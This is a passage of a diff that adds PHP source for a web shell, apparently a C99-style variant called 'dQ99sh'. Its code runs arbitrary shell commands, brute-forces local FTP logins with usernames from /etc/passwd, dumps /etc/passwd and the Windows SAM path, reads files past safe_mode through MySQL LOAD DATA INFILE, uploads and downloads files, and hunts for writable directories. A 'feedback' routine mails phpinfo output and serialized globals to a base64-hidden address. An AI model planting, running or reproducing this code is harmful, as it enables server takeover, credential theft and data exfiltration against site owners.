        "; + if ($sql_act == "newdb") { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
        ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
        Reason:
        ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
        Server-status variables:

        "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
        NameValue
        ".$row[0]."".$row[1]."
        "; + mysql_free_result($result); + } + if ($sql_act == "servervars") { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
        Server variables:

        "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
        NameValue
        ".$row[0]."".$row[1]."
        "; + mysql_free_result($result); + } + if ($sql_act == "processes") { + if (!empty($kill)) { + $query = "KILL ".$kill.";"; + $result = mysql_query($query, $sql_sock); + echo "Process #".$kill." was killed."; + } + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
        Processes:

        "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
        IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
        ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
        "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
        ";} + else {echo "File \"".$sql_getfile."\":
        ".nl2br(htmlspecialchars($f))."
        ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); + } + } + } +} +echo "
        \n"; +if ($sql_sock) { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
        Affected rows : ".$affected."
        \n"; +} +//End of SQL Manager +if ($act == "ftpquickbrute") { +echo "
        "; +echo "". + "". + "". + "". + "". + "
        "; +echo ".: Ftp Quick Brute :.
        "; +if ($win) { echo "Can't run on Windows!"; } +else { + function dQ99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
        "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else { + if ($fqb_logging) { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) { + $str = explode(":",fgets($fp,2048)); + if (dQ99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
        "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
        Done!
        Total time (secs.): ".$ftpquick_t."
        Total connections: ".$i."
        Success.: ".$success."
        Unsuccess.:".($i-$success)."
        Connects per second: ".round($i/$ftpquick_t,2)."
        "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else { + $logfile = $tmpdir_logs."dQ99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "
        ". + "Read first:
        Users only with shell
        Logging
        Logging to file:
        Logging to e-mail:
        "; + } + echo "
        "; +} +} +if ($act == "d") { + if (!is_dir($d)) { echo "
        $d is a not a Directory!
        "; } + else { + echo "Directory information:"; + if (!$win) { + echo "
        Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
        Perms".view_perms_color($d)."
        Create time ".date("d/m/Y H:i:s",filectime($d))."
        Access time ".date("d/m/Y H:i:s",fileatime($d))."
        MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."
        "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); dQ99shexit();} +if ($act == "security") { + echo "
        .: Server Security Information :.
        \n". + "\n". + "\n"; + echo "\n"; + echo ""; + + function displaysecinfo($name,$value) { + if (!empty($value)) { + echo "\n"; + } + } + if (!$win) { + displaysecinfo("OS Version",dQ99exec("cat /proc/version")); + displaysecinfo("Kernel Version",dQ99exec("sysctl -a | grep version")); + displaysecinfo("Distrib Name",dQ99exec("cat /etc/issue.net")); + displaysecinfo("Distrib Name (2)",dQ99exec("cat /etc/*-realise")); + displaysecinfo("CPU Info",dQ99exec("cat /proc/cpuinfo")); + displaysecinfo("RAM",dQ99exec("free -m")); + displaysecinfo("HDD Space",dQ99exec("df -h")); + displaysecinfo("List of Attributes",dQ99exec("lsattr -a")); + displaysecinfo("Mount Options",dQ99exec("cat /etc/fstab")); + displaysecinfo("lynx installed?",dQ99exec("which lynx")); + displaysecinfo("links installed?",dQ99exec("which links")); + displaysecinfo("GET installed?",dQ99exec("which GET")); + displaysecinfo("Where is Apache?",dQ99exec("whereis apache")); + displaysecinfo("Where is perl?",dQ99exec("whereis perl")); + displaysecinfo("Locate proftpd.conf",dQ99exec("locate proftpd.conf")); + displaysecinfo("Locate httpd.conf",dQ99exec("locate httpd.conf")); + displaysecinfo("Locate my.conf",dQ99exec("locate my.conf")); + displaysecinfo("Locate psybnc.conf",dQ99exec("locate psybnc.conf")); + } + else { + displaysecinfo("OS Version",dQ99exec("ver")); + displaysecinfo("Account Settings",dQ99exec("net accounts")); + displaysecinfo("User Accounts",dQ99exec("net user")); + } + echo "
        Open Base Dir".$hopenbasedir."
        Password File"; + if (!$win) { + if ($nixpasswd) { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
        "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
        From:  To:  

        "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) { + $uid = posix_getpwuid($i); + if ($uid) { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
        "; + } + $i++; + } + } + else {echo "Download /etc/passwd";} + } + else { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (!file_get_contents($v)) { echo "Download password file"; } + } + echo "
        Config Files\n"; + if (!$win) { + $v = array( + array("User Domains","/etc/userdomains"), + array("Cpanel Config","/var/cpanel/accounting.log"), + array("Apache Config","/usr/local/apache/conf/httpd.conf"), + array("Apache Config","/etc/httpd.conf"), + array("Syslog Config","/etc/syslog.conf"), + array("Message of The Day","/etc/motd"), + array("Hosts","/etc/hosts") + ); + $sep = "/"; + } + else { + $windir = $_SERVER["WINDIR"]; + $etcdir = $windir . "\system32\drivers\etc\\"; + $v = array( + array("Hosts",$etcdir."hosts"), + array("Local Network Map",$etcdir."networks"), + array("LM Hosts",$etcdir."lmhosts.sam"), + ); + $sep = "\\"; + } + foreach ($v as $sec_arr) { + $sec_f = substr(strrchr($sec_arr[1], $sep), 1); + $sec_d = rtrim($sec_arr[1],$sec_f); + $sec_full = $sec_d.$sec_f; + $sec_d = rtrim($sec_d,$sep); + if (file_get_contents($sec_full)) { + echo " [ ".$sec_arr[0]." ] \n"; + } + } + echo "
        ".$name."
        ".wordwrap($value,100)."
        \n"; +} +if ($act == "mkfile") { + if ($mkfile != $d) { + if ($overwrite == 0) { + if (file_exists($mkfile)) { echo "FILE EXIST: $overwrite ".htmlspecialchars($mkfile); } + } + else { + if (!fopen($mkfile,"w")) { echo "ACCESS DENIED: ".htmlspecialchars($mkfile); } + else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile); } + } + } + else { echo "
        Enter filename!
        \r\n"; } +} +if ($act == "encoder") { +echo "". + "
        ". + "". + "
        ". + "". + "". + ""; +foreach(array("md5","crypt","sha1","crc32") as $v) { + echo ""; +} +echo "". + "". + "". + "". + "". + "". + "". + "
        .: Encoder :.
        Input:
        ". + "
        Hashes:".$v.":
        Url:urlencode:
        urldecode:
        Base64:base64_encode:
        base64_decode:"; +if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} +else { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) { echo ""; } + else { $rows++; echo ""; } + echo " [Send to input]"; +} +echo "
        Base convertations:dec2hex
        "; +} +if ($act == "fsbuff") { + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "

        Buffer is empty!

        ";} + else { + $dQ_infohead = "File-System Buffer"; + $ls_arr = $arr; + $disp_fullpath = TRUE; + $act = "ls"; + } +} +if ($act == "selfremove") { + if (($submit == $rndcode) and ($submit != "")) { + if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".$sh_name."!"; dQ99shexit(); } + else { echo "
        Can't delete ".__FILE__."!
        "; } + } + else { + if (!empty($rndcode)) {echo "Error: incorrect confirmation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
        \n". + "". + "". + "Kill-shell: ".__FILE__."
        ". + "Are you sure? For confirmation, enter \"".$rnd."\" \n". + "\n"; + } +} +if ($act == "update") { + $ret = dQ99sh_getupdate(!!$confirmupdate); + echo "".$ret.""; + if (stristr($ret,"new version")) { + echo "

        "; + } +} +if ($act == "feedback") { + $suppmail = base64_decode("ZGhpZXF3ZWJtYXJrZXJAeWFob28uY29t"); + if (!empty($submit)){ + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
        Thanks for your feedback! Your ticket ID: ".$ticket.".
        "; + } + else { + echo "
        ". + "". + "". + "". + "". + "". + "
        ". + ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.
        Your name:". + "
        Your e-mail:
        Message:
        ". + " Attach Server info (Recommended for bug-fix)
        ". + "*Language: English, Indonesian.
        \n"; + } +} +if ($act == "dQmailer") { + if (!empty($submit)){ + $headers = 'To: '.$dest_email."\r\n"; + $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n"; + if (mail($suppmail,$sender_subj,$sender_body,$header)) { + echo "
        Email sent!
        "; + } + else { echo "
        Can't send email!
        "; } + } + else { + echo "
        ". + "". + "". + "". + "". + "". + "". + "
        ". + ".: $sh_name Mailer :.
        Your name:". + "
        Your e-mail:
        To:
        Subject:
        Message:
        ". + "
        \n"; + } +} +if ($act == "search") { + echo "
        .: $sh_name File-System Search :.
        "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array( + "name"=>$search_name, + "name_regexp"=>$search_name_regexp, + "text"=>$search_text, + "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {dQ99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "". + "". + "". + "". + "". + "". + "
        ". + "". + "File or folder Name:
          - Regular Expression
        Look in (Separate by \";\"):
        A word or phrase in the file:
        Regular Expression". + " Whole words only". + " Case sensitive". + " Find files NOT containing the text
        \n"; + if ($act == "ls") { + $dspact = $act; + echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).
        ". + "
        "; + } +} +if ($act == "chmod") { + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else { + $form = TRUE; + if ($chmod_submit) { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; } + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
        ".($err?"Error: ".$err:"")."
        Owner

         Read
         Write
        eXecute
        Group

         Read
         Write
        eXecute
        World

         Read
         Write
        eXecute
        "; + } + } +} +if ($act == "upload") { + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;} + if (!empty($submit)) { + global $_FILES; + $uploadfile = $_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) { + $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
        "; + } + else { $uploadmess .= "File uploaded successfully!
        ".$uploadpath.$destin; } + } + else { echo "No file to upload!"; } + } + if ($miniform) { + echo "".$uploadmess.""; + $act = "ls"; + } + else { + echo "". + "". + "". + "". + "". + "". + "". + "
        ". + ".: File Upload :.".$uploadmess."
        ". + "From Your Computer:
        From URL:
        Target Directory:
        Target File Name:
        Convert file name to lowercase
        ". + "
        "; + } +} +if ($act == "delete") { + $delerr = ""; + foreach ($actbox as $v) { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."
        "; } + } + if (!empty($delerr)) { echo "Error deleting:
        ".$delerr; } + $act = "ls"; +} +if (!$usefsbuff) { + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) { + echo "
        Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.
        "; + } +} +else { + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); dQ99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); dQ99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} dQ99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); dQ99_sess_put($sess_data);} + elseif ($actpastebuff) { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
        ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
        ";} + unset($sess_data["cut"][$k]); + } + dQ99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
        ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = dQ99exec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
        ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + dQ99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
        ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
        ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
        ";} + unset($sess_data["cut"][$k]); + } + dQ99_sess_put($sess_data); + if (!empty($psterr)) {echo "Error pasting:
        ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") { + @chdir($chdir); + if (!empty($submit)) { + echo "
        .: Results of Execution :.
        \n"; + $olddir = realpath("."); + @chdir($d); + $ret = dQ99exec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) { + $rows = count(explode("\n",$ret))+1; + if ($rows < 10) { $rows = 10; } else { $rows = 30; } + $cols = 130; + echo "\n"; + //echo "
        ".htmlspecialchars($ret)."
        "; + } + else { echo $ret."
        "; } + @chdir($olddir); + } +} +if ($act == "ls") { + if (count($ls_arr) > 0) { $list = $ls_arr; } + else { + $list = array(); + if ($h = @opendir($d)) { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + } + if (count($list) == 0) { echo "
        Can't open folder (".htmlspecialchars($d).")!
        ";} + else { + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";} + elseif (is_dir($v)) { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Date Modified"; + if (!$win) {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = " "; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) { + if (ereg($r[0],$o)) { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; dQ99shexit();} + else { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") { + $row[] = " ".$o.""; + $row[] = "CURDIR"; + } + elseif ($o == "..") { + $row[] = " ".$o.""; + $row[] = "UPDIR"; + } + elseif (is_dir($v)) { + if (is_link($v)) { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = @date("d.m.Y H:i:s",$a[2]); + if (!$win) { $row[] = $a[3]; } + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Edit\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
        .: "; + if (!empty($dQ_infohead)) { echo $dQ_infohead; } + else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; } + echo " :.
        \n"; + echo "
        ". + ""; + foreach($table as $row) { + echo ""; + foreach($row as $v) {echo "";} + echo "\r\n"; + } + echo "
        ".$v."
        ". + "". + "
        ". + "  ". + ""; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) { + echo "                  "; + } + echo " 
        "; + echo "
        "; + } +} +if ($act == "tools") { tools(); } +##[ PHP FILESYSTEM TRICKZ (By diKi) ]## +if ($act == "phpfsys") { + echo "
        "; + $fsfunc = $phpfsysfunc; + if ($fsfunc=="copy") { + if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";} + else { echo "Success! $arg1 copied to $arg2\n"; } + } + elseif ($fsfunc=="rename") { + if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";} + else { echo "Success! $arg1 renamed/moved to $arg2\n"; } + } + elseif ($fsfunc=="chmod") { + if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";} + else { echo "Perm for $arg1 changed to $arg2!\n"; } + } + elseif ($fsfunc=="read") { + $darg = $d.$arg1; + if ($hasil = @file_get_contents($darg)) { + echo "Filename: ".$darg."
        "; + echo "
        \n"; + } + else { echo "
        Couldn't open ".$darg."
        "; } + } + elseif ($fsfunc=="write") { + $darg = $d.$arg1; + if(@file_put_contents($darg,$arg2)) { + echo "Saved! ".$darg; + + } + else { echo "
        Can't write to $darg!
        "; } + } + elseif ($fsfunc=="downloadbin") { + $handle = fopen($arg1, "rb"); + $contents = ''; + while (!feof($handle)) { + $contents .= fread($handle, 8192); + } + $r = @fopen($d.$arg2,'w'); + if (fwrite($r,$contents)) { echo "Success! $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; } + else { echo "
        Can't write to ".$d.$arg2."!
        "; } + fclose($r); + fclose($handle); + } + elseif ($fsfunc=="download") { + $text = implode('', file($arg1)); + if ($text) { + $r = @fopen($d.$arg2,'w'); + if (fwrite($r,$text)) { echo "Success! $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; } + else { echo "
        Can't write to ".$d.$arg2."!
        "; } + fclose($r); + } + else { echo "
        Can't download from $arg1!
        ";} + } + elseif ($fsfunc=='mkdir') { + $thedir = $d.$arg1; + if ($thedir != $d) { + if (file_exists($thedir)) { echo "Already exists: ".htmlspecialchars($thedir); } + elseif (!mkdir($thedir)) { echo "Access denied: ".htmlspecialchars($thedir); } + else { echo "Dir created: ".htmlspecialchars($thedir);} + } + else { echo "Can't create current dir: $thedir"; } + } + elseif ($fsfunc=='fwritabledir') { + function recurse_dir($dir,$max_dir) { + global $dir_count; + $dir_count++; + if( $cdir = dir($dir) ) { + while( $entry = $cdir-> read() ) { + if( $entry != '.' && $entry != '..' ) { + if(is_dir($dir.$entry) && is_writable($dir.$entry) ) { + if ($dir_count > $max_dir) { return; } + echo "[".$dir_count."] ".$dir.$entry."\n"; + recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir); + } + } + } + $cdir->close(); + } + } + if (!$arg1) { $arg1 = $d; } + if (!$arg2) { $arg2 = 10; } + if (is_dir($arg1)) { + echo "Writable directories (Max: $arg2) in: $arg1
        "; + echo "
        ";
        +      recurse_dir($arg1,$arg2);
        +      echo "
        "; + $total = $dir_count - 1; + echo "
        Founds: ".$total." of Max $arg2"; + } + else { + echo "
        Directory is not exist or permission denied!
        "; + } + } + else { + if (!$arg1) { echo "
        No operation! Please fill parameter [A]!
        \n"; } + else { + if ($hasil = $fsfunc($arg1)) { + echo "Result of $fsfunc $arg1:
        "; + if (!is_array($hasil)) { echo "$hasil\n"; } + else { + echo "
        ";
        +          foreach ($hasil as $v) { echo $v."\n"; }
        +          echo "
        "; + } + } + else { echo "
        $fsfunc $arg1 failed!
        \n"; } + } + } + echo "
        \n"; +} +if ($act == "processes") { + echo "
        .: Processes :.
